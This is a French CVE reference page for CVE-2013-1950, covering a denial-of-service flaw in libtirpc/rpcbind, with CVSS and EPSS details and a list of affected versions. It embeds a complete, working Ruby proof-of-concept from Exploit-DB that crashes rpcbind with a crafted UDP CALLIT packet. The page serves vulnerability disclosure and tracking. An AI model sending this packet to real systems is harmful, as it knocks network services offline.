Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-399 |
Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 26887
Date de publication : 2013-07-15 22h00 +00:00
Auteur : Sean Verity
EDB Vérifié : No
#!/usr/bin/ruby
#
# rpcbind_udp_crash_poc.rb
# 07/15/2013
# Sean Verity <veritysr1980 [at] gmail.com>
# CVE 2013-1950
#
# rpcbind (CALLIT Procedure) UDP Crash PoC
# Affected Software Package: rpcbind-0.2.0-19
#
# Tested on:
# Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
# CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
# rpcbind can be crashed by setting the argument length
# value > 8944 in an RPC CALLIT procedure request over UDP.
#
require 'socket'
def usage
abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end
if ARGV.length == 1
pkt = [rand(2**32)].pack('N') # XID
pkt << [0].pack('N') # Message Type: CALL (0)
pkt << [2].pack('N') # RPC Version: 2
pkt << [100000].pack('N') # Program: Portmap (100000)
pkt << [2].pack('N') # Program Version: 2
pkt << [5].pack('N') # Procedure: CALLIT (5)
pkt << [0].pack('N') # Credentials Flavor: AUTH_NULL (0)
pkt << [0].pack('N') # Length: 0
pkt << [0].pack('N') # Credentials Verifier: AUTH_NULL (0)
pkt << [0].pack('N') # Length: 0
pkt << [0].pack('N') # Program: Unknown (0)
pkt << [1].pack('N') # Version: 1
pkt << [1].pack('N') # Procedure: 1
pkt << [8945].pack('N') # Argument Length
pkt << "crash" # Arguments
s = UDPSocket.new
s.send(pkt, 0, ARGV[0], 111)
else
usage
end
Products Mentioned
Configuraton 0
Libtirpc_project>>Libtirpc >> Version To (including) 0.2.3
Libtirpc_project>>Libtirpc >> Version 0.1.8
Libtirpc_project>>Libtirpc >> Version 0.1.9
Libtirpc_project>>Libtirpc >> Version 0.1.10
Libtirpc_project>>Libtirpc >> Version 0.1.11
Libtirpc_project>>Libtirpc >> Version 0.2.0
Libtirpc_project>>Libtirpc >> Version 0.2.1
Libtirpc_project>>Libtirpc >> Version 0.2.2
Références